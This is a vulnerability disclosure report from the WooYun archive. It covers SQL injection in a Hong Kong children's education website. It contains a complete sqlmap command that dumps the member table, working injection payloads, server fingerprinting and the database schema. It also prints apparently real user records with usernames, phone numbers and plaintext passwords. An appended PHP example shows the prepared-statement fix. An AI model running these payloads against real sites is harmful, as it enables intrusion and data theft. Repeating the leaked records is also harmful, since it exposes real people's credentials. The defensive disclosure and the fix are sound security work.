WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2015-11-30: Details reported to the vendor; awaiting the vendor's response
2015-12-01: Vendor confirmed the issue; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and relevant domain experts
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
The newly launched children's education website ikid.hk brings a brand-new online experience to parents across Hong Kong. The site not only covers the city's best talent-development courses, helping parents pick the most suitable enrichment courses for their children, but also gathers the opinions of, and interviews with, many experienced education experts, university professors, registered psychologists, paediatricians, dietitians and other professionals. Parents can also browse background information and the latest activity news for every secondary school, primary school and kindergarten in Hong Kong, and the site collects a wealth of information on infant and child products, clothing and family outings, so that parents can easily keep up with comprehensive parenting information covering learning, emotional management, leisure and entertainment, and academic prospects, and so raise outstanding children.
URL: http://**.**.**.**/article/detail?conCatID=416&contentID=11191
$ python sqlmap.py -u "http://**.**.**.**/article/detail?conCatID=416&contentID=11191" -p conCatID --technique=BE --random-agent --batch -D web266db1 -T member -C username,mobile,email,password --dump --start 1 --stop 5
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 2147    |
+--------+---------+
A small sample of user records is shown below:
Database: web266db1
Table: member
[5 entries]
+-------------+----------------+------------------------+----------+
| username    | mobile         | email                  | password |
+-------------+----------------+------------------------+----------+
| vega0624    | 92106607       | 0624vega@**.**.**.**   | py34gx   |
| <blank>     | <blank>        | 111@**.**.**.**        | 363363   |
| <blank>     | <blank>        | 123@**.**.**.**        | 123456   |
| <blank>     | <blank>        | 1352@**.**.**.**       | 987654   |
| caofengling | 02015975478254 | 1471481714@**.**.**.** | 830129   |
+-------------+----------------+------------------------+----------+
---
Parameter: conCatID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: conCatID=416') AND 2600=2600 AND ('SBTr'='SBTr&contentID=11191

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: conCatID=416') AND (SELECT 1987 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(1987=1987,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lUqI'='lUqI&contentID=11191
---
web server operating system: Linux CentOS
web application technology: PHP 5.4.26, Apache 2.2.27
back-end DBMS: MySQL 5.0
current user: 'web266u1@localhost'
current user is DBA: False
database management system users [1]:
[*] 'web266u1'@'localhost'
Database: web266db1
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| photo                                 | 40120   |
| photo_n_content                       | 37586   |
| content_n_content_category            | 27544   |
| content                               | 12942   |
| member_notification                   | 5734    |
| shop_n_shop_category                  | 4962    |
| shop_most_viewed                      | 4596    |
| shop                                  | 4525    |
| branch                                | 4376    |
| branch_n_district                     | 4361    |
| branch_resturant                      | 2885    |
| member                                | 2147    |
| magazine_subscribe_detail             | 1588    |
| photo_n_shop                          | 1337    |
| photo_n_shop_n_award                  | 1174    |
| votes                                 | 1158    |
| recruit                               | 940     |
| shop_package                          | 625     |
| video_n_magazine                      | 573     |
| forum_post                            | 570     |
| video_n_content                       | 565     |
| video                                 | 564     |
| member_facebook                       | 559     |
| shop_n_award                          | 459     |
| magazine_subscribe                    | 417     |
| content_category                      | 375     |
| shop_contact                          | 300     |
| award_photo                           | 288     |
| text_shop_package                     | 286     |
| shop_category                         | 232     |
| focus_n_forum_category                | 214     |
| award                                 | 213     |
| cover                                 | 207     |
| magazine_subscribe_cp                 | 185     |
| advertisement                         | 152     |
| district                              | 91      |
| award_ceremony                        | 82      |
| hot_discount                          | 68      |
| forum_category                        | 66      |
| photo_n_focus                         | 54      |
| focus_n_shop_category                 | 52      |
| people                                | 52      |
| content_map                           | 51      |
| magazine_relationship                 | 48      |
| focus                                 | 44      |
| photo_n_content_category              | 37      |
| free_magazine                         | 36      |
| magazine                              | 34      |
| pets_media                            | 26      |
| magazine_package                      | 12      |
| promotion_award                       | 11      |
| member_message                        | 9       |
| people_n_award                        | 9       |
| pets_media_n_award                    | 6       |
| tag                                   | 6       |
| pets_zone                             | 5       |
| staff                                 | 5       |
| content_n_tag                         | 4       |
| organisation_category                 | 2       |
| recruit_post                          | 2       |
| organisation                          | 1       |
| organisation_n_organisation_category  | 1       |
| report                                | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1206    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 136     |
| TABLES                                | 136     |
| KEY_COLUMN_USAGE                      | 125     |
| STATISTICS                            | 125     |
| TABLE_CONSTRAINTS                     | 94      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 16      |
| ENGINES                               | 9       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: web266db1
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(25) |
+----------+-------------+
Database: web266db1
Table: rainbow_bridge
[1 column]
+----------------+------+
| Column         | Type |
+----------------+------+
| pass_away_date | date |
+----------------+------+
Database: web266db1
Table: staff
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: web266db1
Table: member
[26 columns]
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| Column           | Type                                                                                                                                         |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| accept_agreement | tinyint(1)                                                                                                                                   |
| birthday         | date                                                                                                                                         |
| children         | int(11)                                                                                                                                      |
| country          | enum('china','hongkong','macau','taiwan','others')                                                                                           |
| creation_date    | datetime                                                                                                                                     |
| education        | enum('secondary','tertiaryeducation','masterdegree')                                                                                         |
| email            | varchar(128)                                                                                                                                 |
| family_income    | enum('under10000','10000-14999','15000-19999','20000-24499','25000-29999','30000-34499','35000-39999','40000-49999','50000-59999','60000up') |
| first_name       | varchar(40)                                                                                                                                  |
| icon             | varchar(256)                                                                                                                                 |
| id_number        | char(4)                                                                                                                                      |
| last_modify_date | datetime                                                                                                                                     |
| last_name        | varchar(20)                                                                                                                                  |
| login_time       | datetime                                                                                                                                     |
| marital_status   | enum('single','married')                                                                                                                     |
| member_id        | int(11)                                                                                                                                      |
| member_type      | enum('normal','master')                                                                                                                      |
| mobile           | varchar(15)                                                                                                                                  |
| notification     | enum('shopping','weddinginfo','beauty','babyandkids','travel','dighitalproduct','fashion','home','pets','nailart','wine','course')           |
| occupation       | enum('professional','merchant','self_employ','manager','clerical_work','sales','housewife','student','retired','others')                     |
| password         | varchar(25)                                                                                                                                  |
| personal_income  | enum('under10000','10000-14999','15000-19999','20000-24499','25000-29999','30000-34499','35000-39999','40000up')                             |
| points           | int(11)                                                                                                                                      |
| reg_source       | varchar(256)                                                                                                                                 |
| sex              | enum('male','female')                                                                                                                        |
| username         | varchar(20)                                                                                                                                  |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
Apply filtering.
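The fix suggestion above is a single line. As an added example, not the affected site's own code, the handler below shows the remedy a reviewer would normally expect for a parameter like conCatID on the PHP 5.4 / MySQL stack the report fingerprints: validate the value as an integer and bind it through a PDO prepared statement instead of concatenating it into the query text. The two parameter names and the database name web266db1 come from the report; the table and column names (content, con_cat_id, content_id, title, body) and the credential placeholders are assumptions.

```php
<?php
// Added example (not the affected site's code): the /article/detail lookup
// with conCatID and contentID validated as integers and bound through a PDO
// prepared statement. Table/column names and the credential placeholders are
// assumptions; the parameter names and database name come from the report.
// Written to run on PHP 5.4 as well as current releases (no 7.x-only syntax).

function fetchArticle(PDO $db, array $query)
{
    // Both values are numeric identifiers in the reported URL
    // (conCatID=416, contentID=11191). Anything else is rejected before any
    // SQL is built, so a value such as "416') AND 2600=2600 AND ('SBTr'='SBTr"
    // never reaches the database at all.
    $intOpts   = array('options' => array('min_range' => 1));
    $conCatId  = filter_var(isset($query['conCatID'])  ? $query['conCatID']  : null, FILTER_VALIDATE_INT, $intOpts);
    $contentId = filter_var(isset($query['contentID']) ? $query['contentID'] : null, FILTER_VALIDATE_INT, $intOpts);
    if ($conCatId === false || $contentId === false) {
        return null; // caller answers 404; nothing is executed
    }

    // Even for values that pass validation, the statement text and the values
    // travel separately: MySQL receives the query with placeholders and the
    // integers as bound parameters, so no value can alter the query structure.
    $stmt = $db->prepare(
        'SELECT content_id, title, body
           FROM content
          WHERE con_cat_id = :cat AND content_id = :id
          LIMIT 1'
    );
    $stmt->bindValue(':cat', $conCatId, PDO::PARAM_INT);
    $stmt->bindValue(':id', $contentId, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// ATTR_EMULATE_PREPARES=false makes the MySQL server do the binding (native
// prepared statements). ERRMODE_EXCEPTION turns driver errors into exceptions
// for the application to log, rather than SQL error text echoed to the client,
// which is the signal the error-based technique in the report depends on.
$db = new PDO(
    'mysql:host=localhost;dbname=web266db1;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',      // assumption: real credentials are not in the report
    'DB_PASSWORD_PLACEHOLDER',
    array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    )
);

$article = fetchArticle($db, $_GET);
if ($article === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: text/html; charset=utf-8');
echo htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8');
```

Binding the parameters closes the injection on this endpoint, but every other query that builds SQL from request input needs the same treatment. It also does nothing about what the dump shows in member.password (a varchar(25) holding values like 123456 in clear text): that is a separate fix, storing only a salted hash of each password, so that a future leak of the table does not hand out usable credentials.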
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-12-01 14:38
Referred to related parties.
None yet.